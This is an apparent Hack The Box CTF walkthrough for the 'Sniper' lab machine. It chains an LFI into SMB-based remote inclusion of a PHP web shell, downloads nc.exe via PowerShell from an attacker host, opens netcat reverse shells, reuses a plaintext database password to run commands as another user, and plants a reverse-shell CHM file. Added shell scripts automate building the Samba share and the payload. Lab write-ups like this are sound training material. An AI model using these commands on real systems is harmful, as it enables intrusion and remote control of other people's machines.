Hack The Box: Sniper Walkthrough

Author: 130n@calvinlai.com

Date: 14 Feb 2020

Acknowledgement:

The game could not have been completed without the support of my friend David Au and the other members of CTF Playgroup Hong Kong & Macau.

Background:

Penetration Methodology:

Service Scanning

Enumeration

Exploitation

Getting Low Privilege Shell

Privilege Escalation

Walkthrough:

Target machine: 10.10.10.151

Attacking (Hacker) machine: 10.10.14.2 (the VPN address changed between sessions; later commands use 10.10.14.14 and 10.10.14.8, so substitute your own address)

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.151. Get a basic picture of the services the target exposes with nmap: a quick default scan first, then an aggressive (-A) scan of the ports that came back open.

0.1) Quick Pre-searching

nmap 10.10.10.151 -oN nmap-htb-sniper-base.txt

0.2) Details Analysis

nmap -sV -p 80,135,139,445 -A -vvv -oN nmap-htb-sniper-detail.txt 10.10.10.151
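The two-step scan above is easy to get wrong when the port list is retyped by hand (nmap's -p wants a comma-separated list; extra space-separated tokens are parsed as target hosts). As an added example that is not part of the original walkthrough, the script below pulls the open ports out of the quick scan's -oN report and feeds them straight into the detailed scan. It assumes nmap's normal output format; the report embedded in it is constructed sample text, not real scan output.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: feed the open ports found
# by the quick scan into the detailed scan instead of retyping them. Assumes
# nmap's normal (-oN) report format; the report below is constructed sample
# text, not real scan output.
set -eu

# Pull open TCP ports out of an -oN report and join them with commas, which is
# what -p expects (80,135,139,445); space-separated ports would be taken as hosts.
open_ports_from_nmap() {   # open_ports_from_nmap <report-file>
    grep -E '^[0-9]+/tcp +open' "$1" | cut -d/ -f1 | sort -n -u | paste -sd, -
}

# Constructed sample of what nmap -oN writes for the quick scan.
SAMPLE_REPORT=$(mktemp)
cat > "$SAMPLE_REPORT" <<'EOF'
# Nmap scan initiated as: nmap 10.10.10.151 -oN nmap-htb-sniper-base.txt
Nmap scan report for 10.10.10.151
Host is up (0.045s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done: 1 IP address (1 host up) scanned
EOF

PORTS=$(open_ports_from_nmap "$SAMPLE_REPORT")
printf 'open ports: %s\n' "$PORTS"     # open ports: 80,135,139,445
rm -f "$SAMPLE_REPORT"

# Detailed service/version scan of exactly those ports. It only runs when a
# target is supplied (TARGET=10.10.10.151 sh scan.sh) so the file is safe to
# source; -oN keeps a copy of the result to diff against later scans.
if [ -n "${TARGET:-}" ]; then
    nmap -sV -A -vvv -p "$PORTS" -oN nmap-htb-sniper-detail.txt "$TARGET"
fi
```

Run the quick scan into a file as in 0.1, then call the script with the real report path in place of the constructed one; the detailed scan then covers exactly the open ports and nothing else.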

Enumeration strategies

  1. Check the website for known vulnerabilities (Nikto)
  2. Check for hidden files/folders of the website
  3. SMB enumeration
  4. Web enumeration (parameters, injection, file inclusion)

Hacking Process Part 1 – Enumeration

1.1) Strategy 1: Check Website Vulnerability

Nikto found nothing that could be abused directly (no authentication bypass or similar).

1.2) Strategy 2: Check for hidden files/folders of the website

python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.151/ -e php,txt -x 301,302,403,404 --simple-report=sniper.dirsearch

1.3) Strategy 3: SMB Enumeration

enum4linux 10.10.10.151

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/app

1.4) Strategy 4: Web Enumeration

Used SQLMap to check the parameters for injection, but the result was negative.

Tried to brute-force the password of a guessed user “admin”.

After further enumeration, the lang parameter turned out to be vulnerable to LFI but not RFI: lang=blog-en.php loads a local file, but pointing the parameter at a web server on the Kali box (lang=http://10.10.14.14/fkclai/mannu.php) does not include anything.

To confirm the LFI, request the Windows hosts file through the parameter: lang=\windows\system32\drivers\etc\hosts
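The LFI/RFI check above is worth scripting, because the two cases look alike in a browser (both return HTTP 200 and a rendered page). The following is an added example, not code from the original walkthrough: it builds the two probe URLs, then classifies the response bodies by looking for the comment line every stock Windows hosts file carries and for a marker that the attacker-hosted file would print. The page URL, parameter name and attacker address come from the environment; the response bodies embedded in the script are constructed samples.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: probe a GET parameter for
# local file inclusion with the Windows hosts file, then for remote inclusion
# over HTTP. The page URL, parameter name and attacker address are taken from
# the environment; the sample response bodies below are constructed.
set -eu

HOSTS_PAYLOAD='\windows\system32\drivers\etc\hosts'

# Percent-encode the backslashes so they survive the request line untouched
# (browsers and some proxies rewrite raw backslashes).
lfi_url() {   # lfi_url <page-url> <param>
    enc=$(printf '%s' "$HOSTS_PAYLOAD" | sed 's/\\/%5C/g')
    printf '%s?%s=%s\n' "$1" "$2" "$enc"
}

# The RFI probe points the parameter at a file we serve (python3 -m http.server
# on the attacker box); that file should print a unique marker, e.g.
# <?php echo 'RFI_PROBE_MARKER'; ?>
rfi_url() {   # rfi_url <page-url> <param> <attacker-ip>
    printf '%s?%s=http://%s/probe.php\n' "$1" "$2" "$3"
}

# Every stock Windows hosts file carries this comment line, so finding it in
# the response proves the include read a local file even when buried in HTML.
looks_like_hosts_file() {
    printf '%s' "$1" | grep -q 'This is a sample HOSTS file used by Microsoft TCP/IP for Windows'
}

# Remote inclusion only counts as confirmed when our marker comes back; a
# normal page body means the http:// wrapper was refused (allow_url_include=Off).
looks_like_rfi() {
    printf '%s' "$1" | grep -q 'RFI_PROBE_MARKER'
}

classify() {  # classify <lfi-response-body> <rfi-response-body>
    lfi=no; rfi=no
    if looks_like_hosts_file "$1"; then lfi=yes; fi
    if looks_like_rfi "$2"; then rfi=yes; fi
    printf 'lfi=%s rfi=%s\n' "$lfi" "$rfi"
}

# Constructed responses: a vulnerable page echoing the hosts file, and the same
# page rendering normally when the http:// include is blocked.
SAMPLE_LFI_BODY=$(printf '<html><body>\n# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n</body></html>')
SAMPLE_RFI_BLOCKED_BODY='<html><body><h1>Blog</h1><p>Select a language</p></body></html>'
classify "$SAMPLE_LFI_BODY" "$SAMPLE_RFI_BLOCKED_BODY"   # lfi=yes rfi=no

# Live run only when pointed at a target, e.g.
#   TARGET_PAGE=http://10.10.10.151/<page>.php ATTACKER=10.10.14.14 sh probe.sh
if [ -n "${TARGET_PAGE:-}" ] && [ -n "${ATTACKER:-}" ]; then
    lfi_body=$(curl -s "$(lfi_url "$TARGET_PAGE" lang)")
    rfi_body=$(curl -s "$(rfi_url "$TARGET_PAGE" lang "$ATTACKER")")
    classify "$lfi_body" "$rfi_body"
fi
```

The result "lfi=yes rfi=no" is exactly the situation described above: the include reads local paths but refuses URL wrappers, which is what motivates the SMB trick in Part 2.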

Hacking Process Part 2 – Exploitation

The “lang” parameter of the GET request is vulnerable to LFI, but inclusion of remote URLs (RFI over HTTP) is blocked.

2.1) from LFI to RFI to Reverse Shell

Searching for ways of exploiting Remote File Inclusion (RFI) in PHP applications while bypassing the remote URL inclusion restriction led to the IndiShell (mannulinux) article in the references: PHP treats a UNC path (\\host\share\file.php) as a local filesystem path, so include() fetches it over SMB even when http:// URLs are refused.

Set up a SAMBA server on the attacking machine for the target to fetch the PHP shell from, following the IndiShell instructions:

  1. Install the SAMBA server: apt-get install samba
  2. Create the SMB share directory (in my case /root/Documents/ctf/tools/samba/pub/)
  3. Create a configuration file at /etc/samba/smb.conf
  4. Restart the SAMBA server to apply the configuration: service smbd restart
  5. Save mannu.php into the SAMBA folder: https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php
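The five steps above omit the contents of smb.conf and the exact value to send in the lang parameter. The script below is an added example, not code from the original walkthrough or from the IndiShell article: it writes a minimal guest-readable share, copies the PHP shell into it, and prints the UNC payload the target will include. The share name “pub”, the directory and the attacker address are assumptions; change them to match your box.

```shell
#!/bin/sh
# Added example, not from the original walkthrough or the mannulinux article:
# script the Samba share used to turn the Windows LFI into code execution.
# PHP treats a UNC path (\\host\share\file.php) as a local filesystem path,
# so include() fetches it over SMB even with allow_url_include=Off, which is
# why the http:// attempt was blocked while this works. Share name "pub",
# directory and attacker IP are assumptions; adjust them to your setup.
set -eu

SHARE_DIR=${SHARE_DIR:-/root/Documents/ctf/tools/samba/pub}
ATTACKER=${ATTACKER:-10.10.14.14}

# Guest-readable, read-only share. "map to guest = Bad User" turns the target's
# anonymous/NTLM attempt into a guest session, and SMB2 as the minimum keeps a
# modern Windows client from refusing to talk to us.
write_smb_conf() {   # write_smb_conf <share-dir>
    cat <<EOF
[global]
    workgroup = WORKGROUP
    server string = Samba Server
    server role = standalone server
    map to guest = Bad User
    usershare allow guests = yes
    server min protocol = SMB2

[pub]
    path = $1
    browsable = yes
    guest ok = yes
    read only = yes
    force user = nobody
EOF
}

# The value the target will include: a UNC path, so no http:// wrapper and no
# need to fight allow_url_include.
inclusion_payload() {  # inclusion_payload <attacker-ip> <filename>
    printf '\\\\%s\\pub\\%s\n' "$1" "$2"
}

# Only touch the system when run as root with --install; otherwise just print
# the config and payload so the file is safe to source or test.
if [ "${1:-}" = "--install" ]; then
    mkdir -p "$SHARE_DIR"
    write_smb_conf "$SHARE_DIR" > /etc/samba/smb.conf
    cp mannu.php "$SHARE_DIR/"          # any PHP shell works here
    chmod -R a+rX "$SHARE_DIR"
    testparm -s /etc/samba/smb.conf >/dev/null   # syntax-check before restart
    service smbd restart
else
    write_smb_conf "$SHARE_DIR"
fi
printf 'include via: lang=%s\n' "$(inclusion_payload "$ATTACKER" mannu.php)"
```

Send the payload with curl or Burp rather than the browser address bar, and percent-encode the backslashes as %5C if the request is mangled; on the Kali side, smbd's log (or tcpdump on port 445) shows the target connecting, which is the quickest way to tell a blocked include from a typo.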

An alternative PHP web shell: https://github.com/WhiteWinterWolf/wwwolf-php-webshell

Running the PHP shell through the SMB include worked; its header reports the host information (uname, server_ip).

Tried to create a file, but it failed: the web server account has no write access in the default folder.

Hacking Process Part 3 – Getting Low Privilege Access

After searching, the following folder turned out to be writable. Upload netcat there and create a reverse shell with the following commands.

3.1) Save the nc.exe to target machine

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.8:8888/win/nc.exe' -OutFile 'C:\ProgramData\MySQL\mysqlsh\nc.exe'"

3.2) Getting the reverse shell

C:\ProgramData\MySQL\mysqlsh\nc.exe 10.10.14.8 1234 -e powershell.exe

After getting low-privilege access, start another round of enumeration. Use AccessChk from Microsoft Sysinternals to check the access rights of the account “Chris”:

https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

Secondly, visit the web document root to look for any useful information.

The DB connection string was found in db.php. In addition, it was confirmed that the system has a user account “sniper\Chris”.

Hacking Process Part 4 – Privilege Escalation

4.1) Privilege escalation from “iusr” to “Chris”

Try the database password from db.php against the local user Chris (password reuse between the web application and a user account): from the reverse shell, wrap it in a PSCredential and run commands as Chris through Invoke-Command.

$pass = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("Sniper\Chris", $pass)

Invoke-Command -ComputerName Sniper -ScriptBlock { pwd } -Credential $cred

Invoke-Command -ComputerName Sniper -ScriptBlock { dir } -Credential $cred

Invoke-Command -ComputerName Sniper -ScriptBlock { C:\ProgramData\MySQL\mysqlsh\nc.exe 10.10.14.8 2345 -e powershell.exe } -Credential $cred

4.2) Privilege escalation from “Chris” to “root”

Found a note at C:\Docs\note.txt, together with an instructions.chm file in the same folder.

The idea: build another CHM file that contains a reverse shell, replace instructions.chm with it, and wait for the Sniper CEO to open it.

Used the Nishang script to create this CHM file, but for some reason it did not work.

Downloaded the EasyCHM tool instead and built the file from an HTML page that launches nc.exe from C:\Docs.

*** Remember to test this CHM file locally first, and also upload nc.exe to the Docs folder (the CHM expects it there).

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.14:8888/win/sniper.CHM' -OutFile 'C:\Docs\instructions.chm'"

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.14:8888/win/nc64.exe' -OutFile 'C:\Docs\nc.exe'"

Conclusion...

Reference Links

RFI via SMB:

http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php

https://github.com/incredibleindishell

CHM backdoor:

https://evi1cg.me/archives/chm_backdoor.html